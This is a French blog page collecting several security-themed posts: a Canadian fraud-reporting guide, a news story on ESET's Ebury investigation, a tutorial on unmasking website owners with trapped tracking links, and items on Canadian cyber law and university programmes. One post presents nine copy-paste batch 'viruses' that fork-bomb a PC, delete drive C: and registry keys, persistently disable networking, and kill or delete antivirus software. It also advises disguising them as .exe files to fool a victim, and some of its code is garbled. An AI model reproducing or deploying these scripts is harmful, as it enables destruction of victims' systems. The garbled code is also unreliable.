Powered By Blogger

Rechercher sur ce blogue

Aucun message portant le libellé anti-Hackers. Afficher tous les messages
Aucun message portant le libellé anti-Hackers. Afficher tous les messages

jeudi 24 octobre 2019

Les Moyens de signaler la fraude


Les Moyens de signaler la fraude: Centre antifraude du Canada
 

fraude, cyberfraude, anti-Hackers,
 

Signaler un incident

Il n'est pas toujours facile de reconnaître une arnaque, surtout que de nouvelles font leur apparition tous les jours.
Si vous croyez être la cible d'une fraude, ou si vous avez déjà envoyé des fonds, n'ayez pas honte – vous n'êtes pas seul. Pour signaler une fraude ou obtenir de plus amples renseignements, communiquez avec le Centre antifraude du Canada.

Moyens de signaler la fraude

Des perturbations intermittentes de notre ligne téléphonique sans frais peuvent entraîner la déconnexion de votre appel. Nous examinons présentement la situation et nous excusons pour tout inconvénient.

Par téléphone

Sans frais
1-888-495-8501

Heures d'ouverture

lundi au vendredi
10 h à 16 h 45
Heure normale de l'Est

Internet – Système de signalement des fraudes du CAFC

Vous pouvez désormais signaler une fraude au Centre antifraude du Canada (CAFC) en utilisant le nouveau Système de signalement des fraudes (SSF). Cet outil convivial vous permet de vous connecter à l'aide :
  • de votre ID d'utilisateur CléGC et de votre mot de passe;
  • d'un partenaire de connexion (justificatifs bancaires).
Les justificatifs d'identité électronique uniques utilisés pour ouvrir une session à l'aide d'une CléGC ou d'un partenaire de connexion vous permettent de communiquer en toute sécurité dans les sites Web du gouvernement du Canada.
Ce nouveau processus d'ouverture de session est rendu obligatoire par le gouvernement fédéral, et il faut accéder à tous les services en ligne du gouvernement du Canada grâce à un ID d'utilisateur CléGC ou à un partenaire de connexion, de façon à mieux protéger les renseignements personnels et à accroître la sécurité en ligne pour les utilisateurs. En vous donnant le choix entre ces deux justificatifs, le gouvernement du Canada rend ses services en ligne plus pratiques et plus faciles à utiliser. Bien des gens se servent déjà régulièrement de leurs justificatifs bancaires et le fait de pouvoir les utiliser pour accéder aux services du gouvernement signifie que les utilisateurs auront un nom et un mot de passe de moins à retenir.
Veuillez noter que le SSF mettra fin à votre session après un délai d'inactivité de 20 minutes. Avant la fermeture de la session, un message s'affichera pour vous demander de prolonger votre session. Au terme du délai d'inactivité, votre session sera fermée. Vos données ne seront pas perdues, mais vous ne pourrez pas ouvrir de nouveau une session pour terminer de remplir le formulaire de plainte. Si vous avez besoin d'ajouter des renseignements à votre plainte, communiquez avec le CAFC pour obtenir de l'aide.

Qu'est-ce que la CléGC?

La CléGC est un service électronique offert par le gouvernement du Canada qui vous permet de faire affaire, en toute sécurité, avec plusieurs programmes et services gouvernementaux, y compris de signaler des fraudes au CAFC.

Qu'est-ce qu'un partenaire de connexion?

Un partenaire de connexion est une institution ayant conclu une entente avec SecureKey Technologies afin de permettre à ses clients d'utiliser leurs justificatifs, comme leur numéro de carte bancaire ou leur nom d'utilisateur et leur mot de passe, pour accéder aux services en ligne du gouvernement du Canada. Il y a actuellement cinq partenaires de connexion : BMO Groupe financier, CHOICE REWARDS MasterCard, Tangerine, la Banque Scotia et le Groupe Financier Banque TD.
Vos renseignements bancaires ne sont pas transmis au gouvernement lorsque vous utilisez un partenaire de connexion. La technologie est conçue de façon à ce que le gouvernement du Canada ne sache pas quel partenaire de connexion (ou institution financière) vous avez utilisé. De même, l'institution financière n'aura aucune idée du ministère ou de l'organisme gouvernemental avec lequel son client a communiqué.
Plus amples renseignements sur la CléGC ou le partenaire de connexion.
Extrait d'un article sur le partenaire de connexion :
Votre numéro de carte bancaire n'est pas une clé d'accès à votre compte en banque, mais un moyen rapide de valider votre identité, dit-il.
Nous vous demandons votre nom et adresse pour nous assurer que vous êtes bien la personne que vous dites être, ajoute-t-il. Nous n'avons aucun accès à vos renseignements.

REF.:

vendredi 4 mai 2018

De jeunes Québécois font la vie dure aux cyberpirates



Un groupe de spécialistes de l'informatique de Montréal a aidé le FBI à faire condamner un citoyen russe à 46 mois de prison l'an dernier. Son crime : une fraude évaluée à plusieurs millions de dollars perpétrée à l'aide d'un logiciel malveillant.
Par Gino Harel et Catherine Varga d’Enquête

Vous ne trouverez pas beaucoup de cheveux gris en entrant dans les bureaux de la compagnie ESET, au centre-ville de Montréal. La firme de cybersécurité, dont le siège social est en Europe, compte plus d’un millier d’employés partout dans le monde. Ils sont une dizaine au bureau de recherche de Montréal.
« La différence majeure entre un hacker et quelqu’un qui est du côté de la défense, c’est ce que l’on fait avec ces connaissances-là : pour attaquer ou pour protéger », lance Alexis Dorais-Joncas, chef d’équipe aux renseignements de sécurité pour le bureau montréalais d’ESET.
« Ceux qui protègent les gens contre les cyberattaques possèdent le même coeur de connaissances que les assaillants », poursuit-il.
Pour effectuer leurs travaux de recherche, Alexis et son équipe comptent notamment sur des clients qui acceptent de partager avec ESET des fichiers qu’ils soupçonnent d’être malveillants.
Les fichiers sont apportés dans notre laboratoire, triés, classifiés par différents systèmes automatiques.
Alexis Dorais-Joncas, chef d’équipe à ESET
Alexis Dorais-Joncas devant un ordinateur
Alexis Dorais-Joncas, chef d’équipe à ESET Photo : Radio-Canada
Opération Windigo
En 2013, la petite équipe d'ESET à Montréal tombe sur un échantillon du logiciel malveillant Ebury. Les chercheurs constatent que le logiciel est utilisé dans diverses attaques contre des systèmes d’exploitation Linux. Pour lutter contre Ebury, ESET lance la cyberopération Windigo.
Les pirates se servent d’Ebury pour accéder à des serveurs et les infecter par ce qu’on appelle une porte dérobée, donc à l’insu de chacun des propriétaires de serveurs compromis.
« Quand on a commencé à travailler sur Ebury, on a contacté plusieurs personnes dans nos cercles proches. Ce qu’on a réalisé, c’est qu’on n’était pas les premiers à avoir regardé cette menace-là [...] Donc, on s’est mis ensemble pour essayer d’éradiquer cette menace », explique Marc-Étienne Léveillé, chercheur en logiciels malveillants à ESET.
Marc-Étienne Léveillé mentionne que son groupe a travaillé avec d’autres organismes internationaux, dont l’agence gouvernementale allemande de cybersécurité CERT-Bund, pour analyser la menace posée par Ebury.
Ils constatent vite que le logiciel permet de se connecter à distance aux serveurs infectés. Les malfaiteurs peuvent ainsi voler le nom des utilisateurs, leurs mots de passe et autres clés d’accès, ce qui leur permet d'infecter d'autres serveurs.
ESET est parvenue à remonter jusqu'à l'une des victimes et lui a demandé d’avoir accès à son serveur pour pouvoir y surveiller le trafic. Une semaine d’observation a suffi pour mesurer l’ampleur du problème.
On a réalisé qu’il y avait au-delà de 7000 serveurs qui étaient compromis, partout à travers le monde. À partir de ce moment, on savait que c’était à assez grande échelle.
Marc-Étienne Léveillé, chercheur en logiciels malveillants
En tout, les chercheurs du groupe qui ont analysé Ebury ont pu dénombrer plus de 25 000 serveurs infectés, la majorité aux États-Unis. On a aussi pu identifier 626 serveurs au Canada.
Marc-Étienne Léveillé devant un ordinateur
Marc-Étienne Léveillé, chercheur en logiciels malveillants à ESET Photo : Radio-Canada
Les pirates surveillent les chercheurs
En 2014, Marc-Étienne, Alexis et leurs collègues ont publié un premier document de recherche sur l’opération Windigo et les ravages du logiciel Ebury. Le rapport dressait le bilan des activités malveillantes des auteurs de l’attaque.
Les serveurs infectés avaient été utilisés pour envoyer environ 35 millions de pourriels par jour, qui permettaient de rediriger quotidiennement près d’un million de requêtes Internet vers des sites publicitaires indésirables.
Un mois après la publication de ce rapport, Marc-Étienne a eu une surprise alors qu’il analysait un nouvel échantillon du logiciel Ebury. À la fin d’une chaîne de caractères chiffrés, on pouvait lire « Good job, ESET! »
« C’était en référence à notre rapport, sans aucun doute, croit-il. Ce sont les auteurs d’Ebury qui nous envoyaient ce message. »
Ils s’intéressent à ce qu’on fait. Ils lisent nos rapports, puis ils voient jusqu’à quel point on comprend ce qu’ils sont en train de faire.
Marc-Étienne Léveillé, chercheur en logiciels malveillants
Sur l'écran, on peut lire : « Good job, ESET! »
Message détecté en 2014 dans un échantillon du logiciel Ebury. Photo : Radio-Canada
Le FBI invité à la traque
Les spécialistes de la cybersécurité sont parfois en contact avec les autorités policières, lorsqu’il est question de crimes informatiques. C’est ce qui s’est passé dans le cas d’Ebury : le FBI a été invité à joindre ESET et ses partenaires.
En utilisant des pseudonymes, les pirates ont convaincu certaines entreprises, dont les revenus dépendent du nombre d’internautes qui visitent leurs pages web, de les payer pour augmenter leur trafic.
Une des victimes du stratagème était un site de rencontres pour adultes aux États-Unis. Ce site a ainsi payé des commissions aux pirates pour le trafic Internet généré.
Toutefois, ces entreprises ne savaient pas que la popularité soudaine de leurs sites s’expliquait par des redirections de clics, grâce à des centaines de serveurs informatiques contaminés ou à des pourriels contenant des liens cliquables infectés.
La fraude aura permis aux malfaiteurs de se faire payer des millions de dollars pour tout ce trafic généré frauduleusement.
Exemple de pourriel avec une jeune femme
Exemple de pourriel détecté lors de l’opération Windigo. Photo : Radio-Canada
Le FBI a finalement réussi à faire condamner l’un des auteurs du stratagème. Le citoyen russe a été arrêté en 2015, alors qu’il était de passage en Finlande. Il a été extradé aux États-Unis et a finalement plaidé coupable l’an dernier.
Il purge présentement une peine de 46 mois de détention dans une prison du Minnesota. Il avait des complices, selon le FBI. Visiblement, ceux-ci sont toujours au large… et bien actifs.
Le jeu du chat et de la souris se poursuit
Malgré l’arrestation d’un des auteurs, ESET n’a pas fini de suivre la trace des cyberassaillants derrière le logiciel malveillant Ebury. En novembre dernier, Marc-Étienne et ses collègues ont tenté de les attirer vers un serveur délibérément compromis afin de pouvoir observer leurs actions. Dans le milieu, on appelle cela un honeypot, un « pot de miel » en français.
« Les assaillants s’y sont fait prendre. Ils ont passé environ quatre heures à tenter de comprendre sur quoi ils étaient tombés, raconte Marc-Étienne. Puis ils ont compris. » Avant de se déconnecter, ils ont envoyé un autre message qui se lisait comme suit : « hello ESET honeypot ».
« Ils ont découvert que c’était un piège », dit Marc-Étienne.
Capture d'écran du message
Message détecté en 2017 dans un échantillon du logiciel Ebury. Photo : Radio-Canada
Les auteurs d'Ebury sont toujours actifs aujourd’hui.
L’automne dernier, ESET a produit un nouveau rapport pour faire le point sur les activités de ce groupe de cyberpirates. Ces derniers font leur possible pour brouiller les pistes derrière eux.
À la suite de la publication des rapports d’ESET, les auteurs d'Ebury ont modifié certaines de leurs techniques, ce qui rend leur surveillance plus difficile.
Dans cette joute qui prend des allures de cyberguerre, le partage d’information est crucial, rappelle Alexis Dorais-Joncas.
Les attaquants se parlent entre eux, il n’y a aucun doute. Ils se partagent des trucs [...] pour mieux performer, mieux réussir leurs attaques.
Alexis Dorais-Joncas, chef d’équipe à ESET
« Si on ne se parle pas, au niveau de la défense, et qu’on ne partage pas ce qu’on a trouvé, on va perdre la guerre. On va perdre le terrain très rapidement », résume-t-il.

mardi 17 octobre 2017

6 méthodes méconnues pour connaitre et identifier le propriétaire d’un site



Vous voulez trouver le propriétaire d’un site web pour mille et une raisons différentes :
  • L’auteur d’un site vous insulte, vous provoque ou diffame ;
  • Pour savoir qui se cache derrière un site de e-commerce qui vous semble louche ;
  • Par pure curiosité ;
  • Si c’est un concurrent commercial, il peut être utile de savoir à qui vous avez affaire ;
  • Pour remonter à l’auteur d’une vidéo ou d’un contenu quelconque ;
  • Pour enquêter et vous amuser
Il n’existe pas d’outils magiques pour trouver le propriétaire d’un site web, seulement quelques trucs plus ou moins connus qui permettent d’arriver à vos fins. Voyons les plus efficaces !

1. L’outil magique pour débroussailler : SpyOnWeb

Avant de détailler des techniques de recherche manuelles, je voulais vous parler de SpyOnWeb.com qui permet, la plupart du temps, d’obtenir énormément d’informations et de trouver le propriétaire d’un site web. SpyOnWeb est un petit algorithme qui demande des info sur un site web et qui recrache, à sa sortie, plein de données qu’il a pu extraire tout seul.
Le plus puissant est, à mon sens, son analyse de l’identifiant analytique. Lorsqu’un webmaster veut connaître le comportement des visiteurs sur son site, le nombre de visites qu’il a chaque jour, etc… il va installer un système de tracking sur son site. Les webmasters se tournent généralement vers Google Analytics (un service gratuit de Google qui fait très bien cela).
Pour installer ce système de tracking sur leurs sites, les webmasters doivent insérer un petit bout de code dans leurs pages. Et dans ce petit bout de code se trouve un identifiant unique qui les identifie. Si un webmaster possède 3 sites, il pourra avoir le même identifiant analytique sur ses 3 sites. Je dis “pourra” car ce n’est pas toujours le cas malheureusement.
Pour trouver ce petit identifiant, rendez-vous sur le site à stalker, faites un clic doit n’importe où puis cliquez sur “voir la source de la page” (vous pouvez aussi passer par le menu “fichier => voir la source” s’il n’y a rien en faisant un clic droit).
Voir la source
S’ouvrira alors une page pleine de code HTML.
source du site

Faites une recherche (le raccourci clavier CTRL+F) sur le mot-clef : “UA-“. Si un code Google Analytics est présent sur le site web, le curseur se placera sur un truc du genre :
ga(‘create’, ‘UA-48884625-1‘, ‘le-site.com’);
ga(‘send’, ‘pageview’);
Dans mon exemple, l’identifiant à récupérer est UA-48884625-1. L’identifiant parent est UA-48884625, le “-1” à la fin veut dire que ce site est le premier d’un groupe de site. Sur un autre site du même webmaster, vous pourrez trouver “UA-48884625-2″ par exemple.
Donnez l’identifiant parent à SpyOnWeb.com et celui-ci essaiera de trouver tous les autres sites qu’il connaît qui utilisent le même identifiant analytique. Parfois il trouve, parfois non. Ne lui confiez pas tous vos espoirs mais quand ça marche, c’est de la bombe ! SpyOnWeb est un annuaire comme un autre : s’il n’a jamais référencé le site que vous cherchez à analyser, il ne vous donnera aucune information. Voila sa grande faiblesse.
Si vous pensez que deux sites appartiennent peut-être à la même personne, vous pouvez faire le travail de SpyOnWeb vous même : ouvrez le code source des deux sites et cherchez les codes UA-…… de chacun d’eux et comparez-les manuellement.

2. Le Reverse IP Lookup : obtenir les autres sites d’un webmaster

Le reverse IP est un outil incroyablement puissant, mais il demande de comprendre les bases de l’hébergement de sites web. Ne vous inquiétez pas, c’est assez simple. N’hésitez pas à poser vos questions en commentaire si besoin.
Lorsque vous créez votre propre site Internet, vous avez grosso modo 2 manières de le mettre en ligne pour qu’il soit accessible sur toute la planète :
  • Soit vous utilisez un “hébergement mutualisé”. C’est l’équivalent d’une collocation entre sites web : l’entreprise qui va mettre votre site en ligne sur Internet mettra votre site en “collocation” avec d’autres sites sur le même serveur web. C’est une manière de faire qui ne coûte pas grand chose. Problème : si l’un de vos colocataires fait des bêtises de son côté du serveur, votre site peut être piraté ou très ralenti.
  • Soit vous utilisez un “hébergement dédié”. Cela équivaut à avoir votre propre maison : votre site web est hébergé sur un serveur qui vous appartient entièrement, sans devoir vous taper des colocataires parfois pénibles. Cette solution est plus chère et plus complexe pour le webmaster.
Quelque soit votre manière de faire, votre site web sera toujours hébergé sur un serveur web, c’est comme ça que ça marche. Comme je l’ai expliqué juste avant, ce serveur web sera soit entièrement dédié à vos sites à vous, soit il sera partagé avec d’autres webmasters comme une colloc.
Un serveur web est un ordinateur comme un autre, il possède donc une adresse IP qui l’identifie sur Internet. Grâce à cette adresse IP et au protocole DNS (je ne rentre pas dans les détails, vous pouvez faire abstraction), il est possible d’obtenir la liste de tous les sites qu’héberge un serveur web donné.
Prenons un exemple concret. Vous cherchez à espionner un site en particulier, pour trouver le propriétaire d’un site web. Disons que ce site est hébergé sur un serveur dédié, c’est à dire un serveur qui appartient entièrement au propriétaire du site en question. Peut-être que ce webmaster possède d’autres sites que celui que vous cherchez à espionner, et peut-être que ces autres sites sont installés sur le même serveur web que votre site cible ! Sans utiliser un outil de reverse IP, vous n’avez aucun moyen de savoir si d’autres sites partagent le serveur de ce webmaster. Voyons comment cela fonctionne avec le serveur web de mon éditeur.
Utilisez par exemple le Reverse IP de Domaintools.com. Tapez l’adresse du site à espionner dans la recherche et validez :
trouver le propriétaire d'un site web
L’outil a trouvé 3 autres sites hébergés sur le même serveur que jesaisquivousetes.com : apprendre-a-manipuler.com, bonjourinternet.org et institut-pandore.com. Cela donne énormément d’informations sur les activités qui entourent un site web.
Ce service de domaintools.com demande de payer pour obtenir la fin de la liste. La plupart des outils de reverse IP demandent de payer pour obtenir une liste complète.
Toute à l’heure, je vous expliquais la différence entre un hébergement dédié et un hébergement mutualisé : si votre site cible est hébergé dans une énorme “collocation” de sites web, alors la liste du reverse IP sera très longue et incohérente. Tous les sites n’appartiendront pas à la même personne, puisqu’il s’agit d’une collocation.
Au contraire, si le site web est hébergé sur un serveur dédié (c’est le cas pour jesaisquivousetes.com), tous les sites de la liste appartiennent à la même personne, de près ou de loin. A vous de faire le tri.

3. Le Tracking Link Creator : géolocaliser et pister le propriétaire

Toujours fidèle au poste, le TLC vous permettra de récupérer beaucoup d’informations sur le webmaster d’un site à condition de pouvoir lui envoyer votre lien piégé par e-mail.
Pour plus d’informations sur le TLC, je vous invite à lire mon article : Localiser et espionner quelqu’un sur Skype, Facebook ou sur le web. Profitez d’un formulaire de contact ou d’un espace commentaires pour insérer votre tracking link.

4. Le Whois

Il est par exemple possible d’utiliser la fonction whois 1and1 pour obtenir des informations sur le propriétaire d’un site web et d’un domaine. L’ICANN, l’organisme qui chapeaute la gestion des noms de domaine sur Internet, souhaite que les propriétaires de sites e-commerce soient obligés d’indiquer leurs coordonnées lorsqu’ils enregistrent leur nom de domaine. Pratique pour savoir à qui appartient tel ou tel site, même si ça ne marche pas à tous les coups.

Découvrez les 3 autres méthodes pour trouver le propriétaire d’un site web

Ces méthodes sont dans mon livre “Je sais qui vous êtes : le manuel d’espionnage sur Internet” pour aller encore plus loin dans vos recherches. Au programme :
  • Comprendre comment fonctionne la fonction whois et apprendre à l’exploiter de manière intelligente ;
  • Comment exploiter Google pour trouver des informations complètement cachées sur un site ;
  • Comment profiter de la loi Française et Européenne pour trouver le propriétaire d’un site web ;
REF.:

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

Loi antiterroriste: Ottawa veut pouvoir lancer des cyberattaques



Le Canada saute dans l'arène de la «guerre 2.0».
Le nouveau projet de loi antiterroriste déposé mardi par le gouvernement Trudeau permettra notamment au Centre de la sécurité des télécommunications (CST) de lancer des cyberattaques contre des cibles étrangères, incluant des groupes terroristes et des pirates informatiques, et même de déployer des mesures défensives contre des cyberattaques menées par des États ou des gouvernements.  Les libéraux justifient cette mesure en affirmant que le Canada doit se protéger contre ces nouvelles menaces qui visent les démocraties.
Toute opération offensive devra être d'abord approuvée par le ministre de la Défense et le nouveau commissaire au renseignement. De plus, le CST ne pourra en aucun cas viser des Canadiens ou des personnes vivant au Canada, sauf si un ministère lui demande de recueillir ou d'analyser des renseignements en vertu d'un mandat du tribunal, prévient-on.
Le mandat de cette agence ultrasecrète, créée il y a 70 ans, comprenait déjà la protection des systèmes informatiques jugés critiques par Ottawa, et ne permettait que la cueillette de renseignement de l'étranger. Ces responsabilités «défensives» demeurent dans le projet de loi C-59, a rappelé le ministre de la Défense nationale, Harjit Sajjan, qui est responsable du CST.
Ce service d'espionnage électronique sera aussi mis à contribution pour aider les militaires à apprendre comment se battre sur le terrain informatique, un mandat ajouté récemment par les libéraux dans la nouvelle Politique de défense du Canada.
Avec ces deux mesures, le Canada fait son entrée dans un monde extrêmement complexe qui est déjà occupé depuis un certain temps par ses alliés. Il y a quelques jours, le CST prévenait que le Canada pourrait être victime de cyberattaques lors de la campagne électorale de 2019, comme on l'a vu ailleurs dans le monde récemment.
Les libéraux souhaitent également maintenir les pouvoirs qui avaient été octroyés par les conservateurs au Service canadien du renseignement de sécurité pour «perturber les menaces étrangères», en vertu du projet de loi C-51.
De nouveaux contrepouvoirs
Le ministre de la Sécurité publique, Ralph Goodale, qui a déposé le projet de loi mardi, a prévenu que son gouvernement liait ses nouveaux pouvoirs à des contrepouvoirs additionnels. Le gouvernement propose ainsi de créer un poste de commissaire au renseignement et un nouvel organisme de surveillance qui supervisera toutes les agences recueillant des renseignements au pays, l'«office de surveillance des activités en matière de sécurité nationale et de renseignement».
Le CST sera par ailleurs autorisé à conserver les informations obtenues «de façon fortuite» - des renseignements qui n'étaient pas directement recherchés, mais qui sont ressortis dans le cadre d'une enquête légitime. Cet élément pourrait inquiéter les défenseurs des libertés civiles, à la lumière des révélations d'Edward Snowden aux États-Unis, notamment, sur le recours à l'espionnage électronique dans le monde.
La question est de savoir jusqu'à quel point les Canadiens seront prévenus de l'ampleur des mesures de cybersurveillance mises en place par le CST et l'armée, notamment les attaques contre des organisations extrémistes et d'autres États. Or, le ministre Sajjan a admis mardi que pour des motifs de sécurité nationale, ce type d'informations ne sera pas divulgué largement au grand public.
Le porte-parole néo-démocrate en matière de sécurité, Matthew Dubé, craint que les mesures de protection prévues dans le projet de loi ne soient pas suffisantes pour s'assurer que les nouveaux pouvoirs du CST s'exerceront de façon appropriée, notamment en empêchant le vol de cyberarmes.
REF.:

jeudi 5 novembre 2015

10 des meilleurs endroits pour étudier la cybersécurité dans le Monde






 
Université du Texas, San Antonio

Prenant la première place dans une étude parrainé par HP Ponemon des programmes de cybersécurité en 2014, l'Université du Texas, San Antonio a plus de 14 cours où les étudiants peuvent étudier INFOSEC et la cybersécurité.


 
 Université de Norwich

Norwich University est une école militaire dans le Vermont. La NSA a répertorié l'école comme un centre d'excellence académique dans l'enseignement de l'assurance de l'information. Il est également venu à la deuxième place dans la liste d'étude Ponemon.


 
 Université de Bristol

L'Université de Bristol au Royaume-Uni accueille le Centre de sécurité Le Bristol, un centre universitaire axé sur la recherche en matière de cybersécurité.


 
 MIT
Alors qu'il ne figurait pas sur la liste 2014 Pokemon, MIT a depuis lancé trois nouvelles initiatives en matière de cybersécurité pour les étudiants.


 
 Mississippi State University

Mississippi State University exploite le Centre de recherche de sécurité informatique (CCSR) vulnérabilités informatiques sont étudiés dans l'espoir d'améliorer la cybersécurité.


 
 Carnegie Mellon University

Carnegie Mellon University a longtemps été connu comme l'un des meilleures universités pour étudier la cybersécurité.


 
 Université de Lancaster

Université de Lancaster, en partenariat avec son initiative de recherche sur la sécurité Lancaster, a développé un programme de formation des professionnels de la cybersécurité dans les grands enjeux du terrain.


 

Université de Syracuse

Syracuse University offre un programme de 15 crédits pour le certificat d'études avancées dans la gestion de la sécurité de l'information, un grand programme de compétences en matière de cybersécurité.



Université Queen de Belfast

Situé en Irlande du Nord, l'Université Queen de Belfast est l'une des nombreuses universités au Royaume-Uni reconnues par le Royaume-Uni de l'agence de renseignement GCHQ.




Purdue University

Bien connu pour ses cours en ingénierie, l'Université Purdue offre aussi plusieurs catégories clés d'informatique nécessaires pour les professionnels de la cybersécurité. Il offre également quelques diplômes d'études supérieures dans INFOSEC.





Source.:

samedi 17 octobre 2015

United States Cyber Command nous protège




United States Cyber Command
Image illustrative de l'article United States Cyber Command

Création
Pays Drapeau des États-Unis États-Unis
Branche United States Strategic Command
Rôle Sécurité de l'information
